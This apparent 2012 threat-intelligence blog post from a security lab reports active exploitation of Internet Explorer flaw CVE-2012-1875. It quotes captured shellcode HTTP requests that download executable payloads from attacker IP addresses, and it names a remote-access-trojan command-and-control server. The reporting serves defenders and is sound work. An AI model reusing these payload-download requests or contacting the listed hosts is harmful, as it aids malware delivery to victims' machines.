AlienVault R&D Labs Portal. Get the latest news from our research.
Header

Ongoing attacks exploiting CVE-2012-1875

June 13th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | IP Reputation | Malware

Yesterday, Microsoft released the June 2012 Black Tuesday Update including patches for a vulnerability affecting a wide range versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.

The 0day has been actively exploited as reported by mcafee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=113.10.241.239

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

 

The exploit includes return-oriented programming (ROP) techniques that helps bypassing OS protections.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The shellcode downloads the payload from the following url:

GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/

 

 

 

 

 

A couple of days ago the AV detection rate was 3/41.

 

Other versions of the exploit have been found in different servers requesting the following payloads:

GET /english/cala.exe HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 140.109.236.143
Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/

 

 

 

 

 

 

 

The payloads seems to be RAT (Remote Access Tools).

The C&C server for that RAT is online (ip address 219.90.117.132)

219.90.117.128 – 219.90.117.159
China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we analyze the components involved on this attack.

 

 

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , ,

You can follow any responses to this entry through the RSS 2.0 Both comments and pings are currently closed.